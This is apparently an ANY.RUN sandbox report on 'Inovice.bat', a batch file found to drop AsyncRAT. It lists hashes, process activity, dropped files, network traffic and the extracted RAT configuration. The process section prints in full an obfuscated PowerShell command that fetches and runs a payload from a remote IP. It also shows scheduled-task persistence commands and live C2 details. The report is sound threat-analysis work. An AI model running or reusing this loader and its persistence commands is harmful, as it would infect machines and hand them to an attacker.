analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Inovice.bat

Full analysis: https://app.any.run/tasks/3bd6edf1-e76e-40d5-bfaa-0ef4a844e6e8
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: December 05, 2022, 19:47:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
asyncrat
trojan
rat
Indicators:
MIME: text/plain
File info: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

BF021F142FA831D9BE71B25476DAF0F6

SHA1:

F2F5735ACD04E2228AC09586CAD425B82409F253

SHA256:

8DBAC79CA4B263BE822F6DDAE805B854753E1118767353654CC26DAB34F44C49

SSDEEP:

192:lzJ1cqL+cWrc2DaODe779zgWg94YWNjaOfQ:pJ1cqL+cWrc2DFe77pgWg94YWNje

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3428)
      • schtasks.exe (PID: 2624)
      • schtasks.exe (PID: 2188)

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)

    • ASYNCRAT detected by memory dumps

      • powershell.exe (PID: 1260)
      • aspnet_compiler.exe (PID: 2116)

    • ASYNCRAT was detected

      • aspnet_compiler.exe (PID: 2116)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3248)

    • Application launched itself

      • cmd.exe (PID: 3248)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3712)
      • WScript.exe (PID: 3992)
      • WScript.exe (PID: 2692)

    • Executes scripts

      • powershell.exe (PID: 1112)

    • Executes via Task Scheduler

      • WScript.exe (PID: 2692)

    • Reads the Internet Settings

      • aspnet_compiler.exe (PID: 2116)

    • Reads settings of System Certificates

      • aspnet_compiler.exe (PID: 2116)

  • INFO

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)

    • Creates a file in a temporary directory

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)

    • Checks supported languages

      • aspnet_compiler.exe (PID: 2116)

    • Reads the computer name

      • aspnet_compiler.exe (PID: 2116)

    • Reads Environment values

      • aspnet_compiler.exe (PID: 2116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(2116) aspnet_compiler.exe
C2 (1)aboreda.linkpc.net
Ports (1)6666
Version| Edit 3LOSH RAT
Autorunfalse
MutexAsyncMutex_fghd
CertificateMIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B...
Server_SignatureGN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS...
AntiVMfalse
PasteBintrue
bdosfalse
BotnetBTC Address
Aes_Key561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Install_Folder%AppData%
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
11
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs powershell.exe wscript.exe no specs powershell.exe no specs schtasks.exe no specs schtasks.exe no specs wscript.exe no specs #ASYNCRAT powershell.exe no specs #ASYNCRAT aspnet_compiler.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3248C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" "C:\Windows\system32\cmd.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3712CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1112POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3992"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3112"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1'))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3428"C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2624"C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2692C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs"C:\Windows\System32\WScript.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1260"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1'))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2116"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
aspnet_compiler.exe
Version:
4.0.30319.34209 built by: FX452RTMGDR
AsyncRat
(PID) Process(2116) aspnet_compiler.exe
C2 (1)aboreda.linkpc.net
Ports (1)6666
Version| Edit 3LOSH RAT
Autorunfalse
MutexAsyncMutex_fghd
CertificateMIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B...
Server_SignatureGN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS...
AntiVMfalse
PasteBintrue
bdosfalse
BotnetBTC Address
Aes_Key561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Install_Folder%AppData%
Total events
7 601
Read events
7 551
Write events
50
Delete events
0

Modification events

(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
Executable files
0
Suspicious files
9
Text files
4
Unknown types
2

Dropped files

PID
Process
Filename
Type
1112powershell.exeC:\Users\admin\AppData\Roaming\Logs\Report.ps1text
MD5:AFEB32EFA5CDAAEE1360F00886C19B10
SHA256:8C46090FB44AF131902A35351D71A5026EEEF32B3CAF880A0C7398BE5D3AD85F
1112powershell.exeC:\Users\admin\AppData\Roaming\Logs\Loader.vbstext
MD5:7A1F08FD27F797B5A5CC2D79F8F6BBA7
SHA256:922DC773ABDFD0812B0E1ADCAABF9DEA2E5F0264573266CF0B024FEB984C632E
1112powershell.exeC:\Users\admin\AppData\Roaming\Logs\install.vbstext
MD5:E35D96B22A7A748D8A85089EA37B003E
SHA256:06B9130D3E031C4729AD96332ED15189D5391B88F81C5BBB0F3A94AC4A05185A
1112powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2116aspnet_compiler.exeC:\Users\admin\AppData\Local\Temp\Cab15F1.tmpcompressed
MD5:FC4666CBCA561E864E7FDF883A9E6661
SHA256:10F3DEB6C452D749A7451B5D065F4C0449737E5EE8A44F4D15844B503141E65B
2116aspnet_compiler.exeC:\Users\admin\AppData\Local\Temp\Tar15F2.tmpcat
MD5:73B4B714B42FC9A6AAEFD0AE59ADB009
SHA256:C0CF8CC04C34B5B80A2D86AD0EAFB2DD71436F070C86B0321FBA0201879625FD
1112powershell.exeC:\Users\admin\AppData\Local\Temp\5ls2h5gk.p1g.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2116aspnet_compiler.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:3EC598FDA7DA5A6080350EADC34CA03F
SHA256:9739D6314CAEA5B5779C6D80E00F205CD57594DC702DAA458528BF92D1E1C1DB
1260powershell.exeC:\Users\admin\AppData\Local\Temp\51v2aea5.1nk.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1260powershell.exeC:\Users\admin\AppData\Local\Temp\4cgvd2ku.ga3.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1112
powershell.exe
GET
200
198.20.177.229:444
http://198.20.177.229:444/x.png
US
text
243 Kb
malicious
2116
aspnet_compiler.exe
GET
200
95.140.236.128:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9f7f011d88e2d5c1
GB
compressed
61.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2116
aspnet_compiler.exe
198.20.177.229:6666
aboreda.linkpc.net
SERVER-MANIA
US
malicious
2116
aspnet_compiler.exe
95.140.236.128:80
ctldl.windowsupdate.com
LLNW
US
malicious
1112
powershell.exe
198.20.177.229:444
aboreda.linkpc.net
SERVER-MANIA
US
malicious

DNS requests

Domain
IP
Reputation
aboreda.linkpc.net
  • 198.20.177.229
malicious
ctldl.windowsupdate.com
  • 95.140.236.128
  • 178.79.242.128
whitelisted

Threats

PID
Process
Class
Message
1112
powershell.exe
Misc activity
ET INFO [TW] Likely Hex Executable String
1112
powershell.exe
Executable code was detected
ET SHELLCODE Common 0a0a0a0a Heap Spray String
Potentially Bad Traffic
ET INFO Observed DNS Query to DynDNS Domain (linkpc .net)
2116
aspnet_compiler.exe
A Network Trojan was detected
ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)
2116
aspnet_compiler.exe
A Network Trojan was detected
ET TROJAN Generic AsyncRAT Style SSL Cert
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Inovice.bat